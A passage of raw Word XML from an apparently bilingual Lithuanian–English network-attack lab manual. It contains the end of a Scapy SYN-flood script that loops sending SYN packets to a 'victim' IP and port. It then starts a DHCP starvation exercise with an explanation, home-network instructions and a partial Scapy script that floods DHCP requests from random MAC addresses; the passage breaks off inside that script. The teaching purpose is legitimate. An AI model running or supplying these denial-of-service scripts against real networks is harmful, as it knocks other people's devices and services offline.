      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sukurimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Create the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13513F53" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sport=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, flags="S")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    packet = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp_packet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2EF6FC11" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430D265" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRPr="001B33B6" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Paketo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>issiuntimas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / Send the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70044BB3" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>packet, verbose=0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>while True:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B33B6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD8F827" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1E2FF0" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="001A5EFA">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">*target_ip – the victim's IP address </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">*target_port – the victim's PORT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F99FDA8" w14:textId="3BF5BB46" w:rsidR="001A5EFA" w:rsidRPr="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">** PORT 80 – TCP service port </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001A5EFA">
        <w:t>** PORT 53 – UDP service port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2071AE65" w14:textId="77777777" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB42687" w14:textId="213596B6" w:rsidR="001A5EFA" w:rsidRDefault="001A5EFA" w:rsidP="001A5EFA">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="001A5EFA">
        <w:t xml:space="preserve">Open Wireshark and run the script. If you see TCP protocol messages, it means you did everything correctly. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72676EBA" w14:textId="102559D8" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001A5EFA"/>
    <w:p w14:paraId="03F470D7" w14:textId="77777777" w:rsidR="001565FC" w:rsidRDefault="001565FC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6F469B" w14:textId="6A1D27FA" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Užduotis Nr. 13</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(Exercise 13)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A092E5C" w14:textId="05B2FEBC" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>DHCP išsekinimo ataka</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>(DHCP starvation attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A949575" w14:textId="4B44D065" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r>
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F02AA" w14:textId="155C5E28" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r>
        <w:t>DHCP yra tinklo serveris, kuris yra atsakingas, jog kiekvienas įrenginys, kuris bando prisijungti į tinklą, automatiškai gautų IP adresą. DHCP išsekinimo atakai pradėjus veikti, užpuolikas siunčia nenustojamą kiekį užklausų į DHCP serverį keičiant savo MAC adresą, ko pasekoje nelieka laisvų IP adresų tinkle ir įrenginys būna neprijungtas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7629C" w14:textId="15D47E4D" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r>
        <w:t xml:space="preserve">Šiam bandymui rekomenduoju pasikeisti Kali ir Ubuntu sistemų tinklą į tarpinį tinklo adapterį (Bridged adapter) ir atlikti šiuos veiksmus savo tinkle. Atjunkite telefoną nuo namų tinklo ir veikiant šiai atakai, pabandykite prisijungti. Jūs arba labai lėtai jungsitės, arba išvis neprisijungsit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CE5955" w14:textId="3AD0ED1C" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r>
        <w:t>Aš asmeniškai bandžiau tris kartu prisijungti prie tinklo, tačiau nesėkmingai. O galiausiai tinklas dingo iš sąrašo ir dėl to net negalėjau daugiau bandyti prisijungti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886964A" w14:textId="77777777" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC"/>
    <w:p w14:paraId="409CB37C" w14:textId="77777777" w:rsidR="001565FC" w:rsidRPr="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r w:rsidRPr="001565FC">
        <w:t xml:space="preserve">EN: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569E7E0D" w14:textId="77777777" w:rsidR="001565FC" w:rsidRPr="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r w:rsidRPr="001565FC">
        <w:t xml:space="preserve">DHCP is a network server responsible for automatically assigning an IP address to every device that tries to connect to the network. When a DHCP starvation attack is launched, the attacker sends an endless number of requests to the DHCP server while continually changing their MAC address. As a result, there are no free IP addresses left in the network, and the device is unable to connect. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956A90B" w14:textId="6875AD79" w:rsidR="001565FC" w:rsidRPr="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:r w:rsidRPr="001565FC">
        <w:t xml:space="preserve">For this test, I recommend changing the network mode of both your Kali and Ubuntu systems to a </w:t>
      </w:r>
      <w:r w:rsidRPr="001565FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bridged adapter</w:t>
      </w:r>
      <w:r w:rsidRPr="001565FC">
        <w:t xml:space="preserve"> and performing this experiment on your own network. Disconnect your phone from the home network and, while the attack is running, try to connect. You will either connect extremely slowly or not connect at all. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9FC930" w14:textId="77777777" w:rsidR="001565FC" w:rsidRDefault="001565FC" w:rsidP="001565FC">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="001565FC">
        <w:t xml:space="preserve">I personally tried connecting to the network three times — unsuccessfully. Eventually, the network completely disappeared from the list, and I could no longer attempt to connect. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3995CE" w14:textId="77777777" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1"/>
    <w:p w14:paraId="5B6CBE0D" w14:textId="585FC3AB" w:rsidR="003770C1" w:rsidRPr="001565FC" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1935"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BA7076A" wp14:editId="5E901418">
            <wp:extent cx="4419600" cy="1095375"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17580372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7260" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4419600" cy="1095375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E7C80" w14:textId="3E191399" w:rsidR="001565FC" w:rsidRDefault="003770C1" w:rsidP="001565FC">
      <w:r w:rsidRPr="003770C1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6311BCA8" wp14:editId="4352D2E6">
            <wp:extent cx="6220693" cy="3096057"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="9075197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19797" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6220693" cy="3096057"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495D904" w14:textId="75893B89" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="001565FC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A56CFEF" wp14:editId="4E718F09">
            <wp:extent cx="6645910" cy="1746250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="1408706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920" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="1746250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D347197" w14:textId="63E52A50" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="001565FC">
      <w:r>
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1E088B" w14:textId="0D3A6CE7" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="001565FC">
      <w:r>
        <w:t>Sukuriate failą „touch DHCPStarvation.py“ ir jį redaguojate „nano DHCPStarvation.py“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBA821" w14:textId="3DBAACC5" w:rsidR="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E57A9" w14:textId="2DD79854" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0646AD" w14:textId="04B4F996" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>conf.checkIPaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530C79E" w14:textId="06BA6C8F" w:rsidR="003770C1" w:rsidRPr="003770C1" w:rsidRDefault="003770C1" w:rsidP="003770C1">
      <w:pPr>
        <w:ind w:left="2592"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ETHER = Ether(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RandMAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">='0.0.0.0', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>='255.255.255.255')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>udp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = UDP(sport=68, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=67)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>bootp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> = BOOTP(op=1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>chaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003770C1">
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RandMAC</w:t>
      </w:r>
